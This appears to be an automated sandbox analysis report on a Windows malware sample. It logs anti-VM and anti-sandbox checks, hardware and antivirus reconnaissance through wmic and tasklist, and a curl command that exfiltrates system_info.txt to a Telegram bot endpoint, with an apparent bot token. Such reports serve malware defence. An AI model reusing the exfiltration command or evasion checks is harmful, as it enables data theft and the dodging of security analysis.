Source: 9KEZfGRjyK.exeBinary or memory string: BrunobrunoFredfredGeorgegeorgeharry johnsonLisaPaul JonesworkvtcdekkerUSERNAMEVBOXVMWAREQEMUXENHYPER-VPARALLELSKVMcomputersystemgetmodel
Source: 9KEZfGRjyK.exeBinary or memory string: AdministratorAlBrunobrunoFredfredGeorgegeorgeharry johnsonLisaPaul JonesworkvtcdekkerUSERNAMEVBOXVMWAREQEMUXENHYPER-VPARALLELSKVMcomputersystemgetmodel
Source: 9KEZfGRjyK.exe, 00000000.00000002.2465951208.0000021FE02CB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: IMAGENAME eq vboxservice.exe\wmic.exejavapathJnyZ"
Source: tasklist.exe, 00000024.00000002.1822204485.000002B99E388000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'VBOXSERVICE.EXE'
Source: 9KEZfGRjyK.exeBinary or memory string: Georgegeorgeharry johnsonLisaPaul JonesworkvtcdekkerUSERNAMEVBOXVMWAREQEMUXENHYPER-VPARALLELSKVMcomputersystemgetmodel
Source: 9KEZfGRjyK.exeBinary or memory string: georgeharry johnsonLisaPaul JonesworkvtcdekkerUSERNAMEVBOXVMWAREQEMUXENHYPER-VPARALLELSKVMcomputersystemgetmodel
Source: getmac.exe, 0000000D.00000002.1750591202.000001733F560000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000000D.00000003.1750010796.000001733F54A000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000000D.00000003.1750117474.000001733F55E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Win32_NetworkProtocolHyper-V RAWHyper-VRAWHyper-V RAWP
Source: 9KEZfGRjyK.exeBinary or memory string: C:\windows\sysnative\drivers\vmmouse.sysC:\windows\sysnative\drivers\vmhgfs.sysC:\windows\sysnative\drivers\vmusbmouse.sysvmtoolsd.exevboxservice.exevboxtray.exeIMAGENAME eq
Source: 9KEZfGRjyK.exeBinary or memory string: /mtasklistsandboxusertestadminrootmalwareanalysisdefaultabbeyAdministratorAlBrunobrunoFredfredGeorgegeorgeharry johnsonLisaPaul JonesworkvtcdekkerUSERNAMEVBOXVMWAREQEMUXENHYPER-VPARALLELSKVMcomputersystemgetmodel
Source: tasklist.exe, 00000024.00000003.1817488080.000002B99E376000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: `, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'VBOXSERVICE.EXE'0
Source: tasklist.exe, 00000024.00000002.1820839789.000002B99E350000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: "tasklist" /fi "IMAGENAME eq vboxservice.exe"
Source: tasklist.exe, 00000024.00000003.1817858101.000002B99E386000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: WMI.ExecQuery(SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'VBOXSERVICE.EXE');
Source: 9KEZfGRjyK.exe, 00000000.00000002.2465951208.0000021FE02D7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: "tasklist" /fi "IMAGENAME eq vboxtray.exe"155041831387140 g
Source: getmac.exe, 0000000D.00000003.1749820674.000001733F58F000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000000D.00000002.1750713120.000001733F597000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000000D.00000003.1749909296.000001733F594000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000000D.00000003.1750010796.000001733F54A000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000000D.00000003.1750117474.000001733F55E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SetPropValue.sSubKeyName("SYSTEM\CurrentControlSet\Services\Hyper-V\Linkage");
Source: tasklist.exe, 00000022.00000003.1813576853.00000219841C8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'VMTOOLSD.EXE'
Source: 9KEZfGRjyK.exeBinary or memory string: harry johnsonLisaPaul JonesworkvtcdekkerUSERNAMEVBOXVMWAREQEMUXENHYPER-VPARALLELSKVMcomputersystemgetmodel
Source: 9KEZfGRjyK.exeBinary or memory string: vboxservice.exevboxtray.exeIMAGENAME eq
Source: tasklist.exe, 00000022.00000002.1814831162.00000219841DB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: cQuery(SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'VMTOOLSD.EXE');
Source: 9KEZfGRjyK.exeBinary or memory string: sbiedll.dlldbghelp.dllapi_log.dlldir_watch.dllpstorec.dllvmcheck.dllwpespy.dll/mtasklistsandboxusertestadminrootmalwareanalysisdefaultabbeyAdministratorAlBrunobrunoFredfredGeorgegeorgeharry johnsonLisaPaul userworkvtcdekkerUSERNAMEVBOXVMWAREQEMUXENHYPER-VPARALLELSKVMcomputersystemgetmodel
Source: tasklist.exe, 00000024.00000002.1822311412.000002B99E635000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'VBOXSERVICE.EXE'>
Source: 9KEZfGRjyK.exeBinary or memory string: brunoFredfredGeorgegeorgeharry johnsonLisaPaul JonesworkvtcdekkerUSERNAMEVBOXVMWAREQEMUXENHYPER-VPARALLELSKVMcomputersystemgetmodel
Source: getmac.exe, 0000000D.00000003.1749820674.000001733F58F000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000000D.00000002.1750713120.000001733F597000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000000D.00000003.1749909296.000001733F594000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: __PARAMETERSSYSTEM\CurrentControlSet\Services\Hyper-V\LinkageExport
Source: 9KEZfGRjyK.exeBinary or memory string: vtcdekkerUSERNAMEVBOXVMWAREQEMUXENHYPER-VPARALLELSKVMcomputersystemgetmodel
Source: 9KEZfGRjyK.exe, 00000000.00000002.2465951208.0000021FE02CB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: - vboxservice.exe32
Source: tasklist.exe, 00000026.00000002.1825465912.000001C063240000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: "tasklist" /fi "IMAGENAME eq vboxtray.exe"
Source: 9KEZfGRjyK.exeBinary or memory string: rootmalwareanalysisdefaultabbeyAdministratorAlBrunobrunoFredfredGeorgegeorgeharry johnsonLisaPaul JonesworkvtcdekkerUSERNAMEVBOXVMWAREQEMUXENHYPER-VPARALLELSKVMcomputersystemgetmodel
Source: tasklist.exe, 00000026.00000002.1825589127.000001C06327C000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000026.00000003.1824734626.000001C06327C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: tasklist/fiIMAGENAME eq vboxtray.exe
Source: 9KEZfGRjyK.exeBinary or memory string: vmcheck.dllwpespy.dll/mtasklistsandboxusertestadminrootmalwareanalysisdefaultabbeyAdministratorAlBrunobrunoFredfredGeorgegeorgeharry johnsonLisaPaul userworkvtcdekkerUSERNAMEVBOXVMWAREQEMUXENHYPER-VPARALLELSKVMcomputersystemgetmodel
Source: getmac.exe, 0000000D.00000002.1750591202.000001733F560000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000000D.00000003.1750010796.000001733F54A000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000000D.00000003.1750117474.000001733F55E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V
Source: tasklist.exe, 00000022.00000003.1813576853.00000219841C8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: tasklist/fiIMAGENAME eq vmtoolsd.exe.
Source: system_info.txt.0.drBinary or memory string: - vboxservice.exe
Source: 9KEZfGRjyK.exeBinary or memory string: VBOXVMWAREQEMUXENHYPER-VPARALLELSKVMcomputersystemgetmodel
Source: tasklist.exe, 00000024.00000002.1820839789.000002B99E350000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: C:\Users\user\Desktop\C:\Windows\system32\tasklist.exe"tasklist" /fi "IMAGENAME eq vboxservice.exe"C:\Windows\system32\tasklist.exeWinsta0\Default1JS
Source: 9KEZfGRjyK.exeBinary or memory string: Paul JonesworkvtcdekkerUSERNAMEVBOXVMWAREQEMUXENHYPER-VPARALLELSKVMcomputersystemgetmodel
Source: tasklist.exe, 00000024.00000002.1820839789.000002B99E350000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: "tasklist" /fi "IMAGENAME eq vboxservice.exe"uJSTW
Source: 9KEZfGRjyK.exe, 00000000.00000002.2465951208.0000021FE02CB000.00000004.00000020.00020000.00000000.sdmp, 9KEZfGRjyK.exe, 00000000.00000002.2465951208.0000021FE02D7000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000002D.00000003.2460062209.0000025DD6519000.00000004.00000020.00020000.00000000.sdmp, system_info.txt.0.drBinary or memory string: - vboxtray.exe
Source: getmac.exe, 0000000D.00000002.1750591202.000001733F560000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000000D.00000003.1750010796.000001733F54A000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000000D.00000003.1750117474.000001733F55E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
Source: 9KEZfGRjyK.exeBinary or memory string: dekkerUSERNAMEVBOXVMWAREQEMUXENHYPER-VPARALLELSKVMcomputersystemgetmodel
Source: tasklist.exe, 00000022.00000002.1814467976.0000021984195000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'VMTOOLSD.EXE'PROS
Source: tasklist.exe, 00000024.00000002.1822204485.000002B99E388000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: IMAGENAME eq vboxservice.exe
Source: 9KEZfGRjyK.exe, 00000000.00000002.2465951208.0000021FE02CB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: IMAGENAME eq vmtoolsd.exdic.exeok
Source: 9KEZfGRjyK.exeBinary or memory string: XENHYPER-VPARALLELSKVMcomputersystemgetmodel
Source: 9KEZfGRjyK.exeBinary or memory string: vmtoolsd.exevboxservice.exevboxtray.exeIMAGENAME eq
Source: 9KEZfGRjyK.exeBinary or memory string: dbghelp.dllapi_log.dlldir_watch.dllpstorec.dllvmcheck.dllwpespy.dll/mtasklistsandboxusertestadminrootmalwareanalysisdefaultabbeyAdministratorAlBrunobrunoFredfredGeorgegeorgeharry johnsonLisaPaul userworkvtcdekkerUSERNAMEVBOXVMWAREQEMUXENHYPER-VPARALLELSKVMcom
Source: tasklist.exe, 00000026.00000002.1825589127.000001C06327C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'VBOXTRAY.EXE'##
Source: tasklist.exe, 00000026.00000002.1825589127.000001C06327C000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000026.00000003.1824734626.000001C06327C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: IMAGENAME eq vboxtray.exe
Source: tasklist.exe, 00000022.00000002.1814579848.00000219841A0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: C:\Users\user\Desktop\C:\Windows\system32\tasklist.exe"tasklist" /fi "IMAGENAME eq vmtoolsd.exe"C:\Windows\system32\tasklist.exeWinsta0\Default
Source: 9KEZfGRjyK.exeBinary or memory string: sandboxusertestadminrootmalwareanalysisdefaultabbeyAdministratorAlBrunobrunoFredfredGeorgegeorgeharry johnsonLisaPaul JonesworkvtcdekkerUSERNAMEVBOXVMWAREQEMUXENHYPER-VPARALLELSKVMcomputersystemgetmodel
Source: tasklist.exe, 00000026.00000002.1825465912.000001C063240000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: C:\Users\user\Desktop\C:\Windows\system32\tasklist.exe"tasklist" /fi "IMAGENAME eq vboxtray.exe"C:\Windows\system32\tasklist.exeWinsta0\Default
Source: 9KEZfGRjyK.exeBinary or memory string: abbeyAdministratorAlBrunobrunoFredfredGeorgegeorgeharry johnsonLisaPaul JonesworkvtcdekkerUSERNAMEVBOXVMWAREQEMUXENHYPER-VPARALLELSKVMcomputersystemgetmodel
Source: system_info.txt.0.drBinary or memory string: - vmtoolsd.exe
Source: 9KEZfGRjyK.exeBinary or memory string: AlBrunobrunoFredfredGeorgegeorgeharry johnsonLisaPaul JonesworkvtcdekkerUSERNAMEVBOXVMWAREQEMUXENHYPER-VPARALLELSKVMcomputersystemgetmodel
Source: 9KEZfGRjyK.exeBinary or memory string: sbiedll.dlldbghelp.dllapi_log.dlldir_watch.dllpstorec.dllvmcheck.dllwpespy.dll/mtasklistsandboxusertestadminrootmalwareanalysisdefaultabbeyAdministratorAlBrunobrunoFredfredGeorgegeorgeharry johnsonLisaPaul userworkvtcdekkerUSERNAMEVBOXVMWAREQEMUXENHYPER-VPARA
Source: 9KEZfGRjyK.exeBinary or memory string: VMWAREQEMUXENHYPER-VPARALLELSKVMcomputersystemgetmodel
Source: tasklist.exe, 00000026.00000003.1824606109.000001C063266000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000026.00000002.1825555364.000001C06326C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: , ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'VBOXTRAY.EXE'0
Source: 9KEZfGRjyK.exeBinary or memory string: vboxtray.exeIMAGENAME eq
Source: 9KEZfGRjyK.exe, 00000000.00000002.2465951208.0000021FE02CB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: IMAGENAME eq vmtoolsd.exd
Source: tasklist.exe, 00000022.00000003.1813576853.00000219841C8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: IMAGENAME eq vmtoolsd.exe
Source: 9KEZfGRjyK.exe, 00000000.00000002.2465951208.0000021FE02D7000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000002D.00000003.2460062209.0000025DD6519000.00000004.00000020.00020000.00000000.sdmp, system_info.txt.0.drBinary or memory string: Hyper-V Requirements: VM Monitor Mode Extensions: No
Source: 9KEZfGRjyK.exeBinary or memory string: wpespy.dll/mtasklistsandboxusertestadminrootmalwareanalysisdefaultabbeyAdministratorAlBrunobrunoFredfredGeorgegeorgeharry johnsonLisaPaul userworkvtcdekkerUSERNAMEVBOXVMWAREQEMUXENHYPER-VPARALLELSKVMcomputersystemgetmodel
Source: curl.exe, 0000002D.00000003.2465008395.0000025DD64D3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: 9KEZfGRjyK.exeBinary or memory string: fredGeorgegeorgeharry johnsonLisaPaul JonesworkvtcdekkerUSERNAMEVBOXVMWAREQEMUXENHYPER-VPARALLELSKVMcomputersystemgetmodel
Source: tasklist.exe, 00000024.00000002.1822311412.000002B99E630000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: tasklist/fiIMAGENAME eq vboxservice.exel\Te
Source: tasklist.exe, 00000024.00000002.1822204485.000002B99E388000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: tasklist/fiIMAGENAME eq vboxservice.exe?y
Source: 9KEZfGRjyK.exeBinary or memory string: FredfredGeorgegeorgeharry johnsonLisaPaul JonesworkvtcdekkerUSERNAMEVBOXVMWAREQEMUXENHYPER-VPARALLELSKVMcomputersystemgetmodel
Source: getmac.exe, 0000000D.00000003.1749820674.000001733F58F000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000000D.00000002.1750713120.000001733F597000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000000D.00000003.1749909296.000001733F594000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SYSTEM\CurrentControlSet\Services\Hyper-V\Linkage
Source: 9KEZfGRjyK.exeBinary or memory string: HYPER-VPARALLELSKVMcomputersystemgetmodel
Source: getmac.exe, 0000000D.00000003.1750010796.000001733F54A000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000000D.00000003.1750117474.000001733F55E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-Vq
Source: getmac.exe, 0000000D.00000002.1750591202.000001733F560000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000000D.00000003.1750010796.000001733F54A000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000000D.00000003.1750117474.000001733F55E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ssubkeyname"system\currentcontrolset\services\hyper-v\linkage"
Source: tasklist.exe, 00000022.00000002.1814467976.0000021984190000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: tasklist/fiIMAGENAME eq vmtoolsd.exea\Local\Tew
Source: 9KEZfGRjyK.exeBinary or memory string: QEMUXENHYPER-VPARALLELSKVMcomputersystemgetmodel
Source: 9KEZfGRjyK.exe, 00000000.00000002.2465951208.0000021FE02CB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: IMAGENAME eq vboxservice.exe\
Source: tasklist.exe, 00000026.00000003.1824734626.000001C06327C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: WMI.ExecQuery(SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'VBOXTRAY.EXE');
Source: C:\Windows\System32\wbem\WMIC.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Users\user\Desktop\9KEZfGRjyK.exeCode function: 0_2_00007FF7B9049174 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF7B9049174
Source: C:\Users\user\Desktop\9KEZfGRjyK.exeCode function: 0_2_00007FF7B903AA60 WaitForSingleObjectEx,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetCurrentProcess,GetProcAddress,GetCurrentProcess,lstrlenW,GetCurrentProcessId,CreateMutexA,CloseHandle,GetProcAddress,GetCurrentProcess,GetProcAddress,GetCurrentProcess,ReleaseMutex,0_2_00007FF7B903AA60
Source: C:\Users\user\Desktop\9KEZfGRjyK.exeCode function: 0_2_00007FF7B902E030 HeapAlloc,GetProcessHeap,HeapAlloc,0_2_00007FF7B902E030
Source: C:\Windows\System32\tasklist.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\tasklist.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\tasklist.exeProcess token adjusted: Debug
Source: C:\Windows\System32\tasklist.exeProcess token adjusted: Debug
Source: C:\Windows\System32\tasklist.exeProcess token adjusted: Debug
Source: C:\Windows\System32\tasklist.exeProcess token adjusted: Debug
Source: C:\Windows\System32\tasklist.exeProcess token adjusted: Debug
Source: C:\Windows\System32\tasklist.exeProcess token adjusted: Debug
Source: C:\Windows\System32\tasklist.exeProcess token adjusted: Debug
Source: C:\Windows\System32\tasklist.exeProcess token adjusted: Debug
Source: C:\Users\user\Desktop\9KEZfGRjyK.exeCode function: 0_2_00007FF7B904C07C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00007FF7B904C07C
Source: C:\Users\user\Desktop\9KEZfGRjyK.exeCode function: 0_2_00007FF7B9049174 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF7B9049174
Source: C:\Users\user\Desktop\9KEZfGRjyK.exeCode function: 0_2_00007FF7B9049318 SetUnhandledExceptionFilter,0_2_00007FF7B9049318
Source: C:\Users\user\Desktop\9KEZfGRjyK.exeMemory allocated: page read and write | page guardJump to behavior
Source: C:\Users\user\Desktop\9KEZfGRjyK.exeProcess created: C:\Windows\System32\wbem\WMIC.exe "wmic" bios get serialnumberJump to behavior
Source: C:\Users\user\Desktop\9KEZfGRjyK.exeProcess created: C:\Windows\System32\wbem\WMIC.exe "wmic" baseboard get serialnumberJump to behavior
Source: C:\Users\user\Desktop\9KEZfGRjyK.exeProcess created: C:\Windows\System32\wbem\WMIC.exe "wmic" cpu get nameJump to behavior
Source: C:\Users\user\Desktop\9KEZfGRjyK.exeProcess created: C:\Windows\System32\wbem\WMIC.exe "wmic" computersystem get totalphysicalmemoryJump to behavior
Source: C:\Users\user\Desktop\9KEZfGRjyK.exeProcess created: C:\Windows\System32\wbem\WMIC.exe "wmic" diskdrive get model,sizeJump to behavior
Source: C:\Users\user\Desktop\9KEZfGRjyK.exeProcess created: C:\Windows\System32\wbem\WMIC.exe "wmic" /namespace:\\root\SecurityCenter2 path AntivirusProduct get displayNameJump to behavior
Source: C:\Users\user\Desktop\9KEZfGRjyK.exeProcess created: C:\Windows\System32\getmac.exe "getmac"Jump to behavior
Source: C:\Users\user\Desktop\9KEZfGRjyK.exeProcess created: C:\Windows\System32\systeminfo.exe "systeminfo"Jump to behavior
Source: C:\Users\user\Desktop\9KEZfGRjyK.exeProcess created: C:\Windows\System32\tasklist.exe "tasklist" /m sbiedll.dllJump to behavior
Source: C:\Users\user\Desktop\9KEZfGRjyK.exeProcess created: C:\Windows\System32\tasklist.exe "tasklist" /m dbghelp.dllJump to behavior
Source: C:\Users\user\Desktop\9KEZfGRjyK.exeProcess created: C:\Windows\System32\tasklist.exe "tasklist" /m api_log.dllJump to behavior
Source: C:\Users\user\Desktop\9KEZfGRjyK.exeProcess created: C:\Windows\System32\tasklist.exe "tasklist" /m dir_watch.dllJump to behavior
Source: C:\Users\user\Desktop\9KEZfGRjyK.exeProcess created: C:\Windows\System32\tasklist.exe "tasklist" /m pstorec.dllJump to behavior
Source: C:\Users\user\Desktop\9KEZfGRjyK.exeProcess created: C:\Windows\System32\tasklist.exe "tasklist" /m vmcheck.dllJump to behavior
Source: C:\Users\user\Desktop\9KEZfGRjyK.exeProcess created: C:\Windows\System32\tasklist.exe "tasklist" /m wpespy.dllJump to behavior
Source: C:\Users\user\Desktop\9KEZfGRjyK.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
Source: C:\Users\user\Desktop\9KEZfGRjyK.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
Source: C:\Users\user\Desktop\9KEZfGRjyK.exeProcess created: C:\Windows\System32\tasklist.exe "tasklist" /fi "IMAGENAME eq vboxservice.exe"Jump to behavior
Source: C:\Users\user\Desktop\9KEZfGRjyK.exeProcess created: C:\Windows\System32\tasklist.exe "tasklist" /fi "IMAGENAME eq vboxtray.exe"Jump to behavior
Source: C:\Users\user\Desktop\9KEZfGRjyK.exeProcess created: C:\Windows\System32\wbem\WMIC.exe "wmic" csproduct get identifyingnumberJump to behavior
Source: C:\Users\user\Desktop\9KEZfGRjyK.exeProcess created: C:\Windows\System32\curl.exe "curl" -k -F chat_id=-4193710271 -F document=@system_info.txt;filename=528110-4174-1.log https://api.telegram.org/bot7068399075:AAEU8zRzCqB0URyCZuIuzOS0iXNMCPf1hu4/sendDocumentJump to behavior
Source: C:\Windows\System32\curl.exeQueries volume information: C:\Users\user\Desktop\system_info.txt VolumeInformation
Source: C:\Users\user\Desktop\9KEZfGRjyK.exeCode function: 0_2_00007FF7B902FDF0 ProcessPrng,GetCurrentProcessId,ProcessPrng,CreateNamedPipeW,GetLastError,CloseHandle,ProcessPrng,0_2_00007FF7B902FDF0
Source: C:\Users\user\Desktop\9KEZfGRjyK.exeCode function: 0_2_00007FF7B902AB10 GetSystemTimePreciseAsFileTime,0_2_00007FF7B902AB10
Source: C:\Users\user\Desktop\9KEZfGRjyK.exeCode function: 0_2_00007FF7B901DA70 GetTimeZoneInformationForYear,0_2_00007FF7B901DA70
Source: C:\Windows\System32\curl.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT displayName FROM AntivirusProduct
Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct
Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct

Mitre Att&ck Matrix

ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid Accounts341
Windows Management Instrumentation		1
DLL Side-Loading		12
Process Injection		1
Masquerading		OS Credential Dumping2
System Time Discovery		Remote Services1
Archive Collected Data		1
Web Service		Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault Accounts1
Native API		Boot or Logon Initialization Scripts1
DLL Side-Loading		33
Virtualization/Sandbox Evasion		LSASS Memory461
Security Software Discovery		Remote Desktop ProtocolData from Removable Media21
Encrypted Channel		Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
Disable or Modify Tools		Security Account Manager33
Virtualization/Sandbox Evasion		SMB/Windows Admin SharesData from Network Shared Drive2
Non-Application Layer Protocol		Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook12
Process Injection		NTDS2
Process Discovery		Distributed Component Object ModelInput Capture3
Application Layer Protocol		Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
Deobfuscate/Decode Files or Information		LSA Secrets1
File and Directory Discovery		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
Obfuscated Files or Information		Cached Domain Credentials135
System Information Discovery		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
DLL Side-Loading		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1578571 Sample: 9KEZfGRjyK.exe Startdate: 19/12/2024 Architecture: WINDOWS Score: 72 37 api.telegram.org 2->37 43 Machine Learning detection for sample 2->43 45 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 2->45 47 Sigma detected: Rare Remote Thread Creation By Uncommon Source Image 2->47 8 9KEZfGRjyK.exe 1 2->8         started        signatures3 49 Uses the Telegram API (likely for C&C communication) 37->49 process4 signatures5 51 Contain functionality to detect virtual machines 8->51 53 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 8->53 11 getmac.exe 1 8->11         started        14 WMIC.exe 1 8->14         started        16 systeminfo.exe 2 1 8->16         started        18 18 other processes 8->18 process6 dnsIp7 55 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 11->55 57 Writes or reads registry keys via WMI 11->57 21 conhost.exe 11->21         started        23 conhost.exe 11->23         started        59 Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines) 14->59 25 conhost.exe 14->25         started        27 conhost.exe 16->27         started        39 api.telegram.org 149.154.167.220, 443, 49775 TELEGRAMRU United Kingdom 18->39 41 127.0.0.1 unknown unknown 18->41 61 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 18->61 29 conhost.exe 18->29         started        31 conhost.exe 18->31         started        33 conhost.exe 18->33         started        35 15 other processes 18->35 signatures8 process9

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
9KEZfGRjyK.exe5%ReversingLabs
9KEZfGRjyK.exe100%Joe Sandbox ML

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

No Antivirus matches

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
api.telegram.org
149.154.167.220
truefalse
    		high

    Contacted URLs

    NameMaliciousAntivirus DetectionReputation
    https://api.telegram.org/bot7068399075:AAEU8zRzCqB0URyCZuIuzOS0iXNMCPf1hu4/sendDocumentfalse
      		high

      URLs from Memory and Binaries

      NameSourceMaliciousAntivirus DetectionReputation
      https://api.telegram.org/botc9KEZfGRjyK.exe, 00000000.00000002.2465951208.0000021FE02CB000.00000004.00000020.00020000.00000000.sdmpfalse
        		high
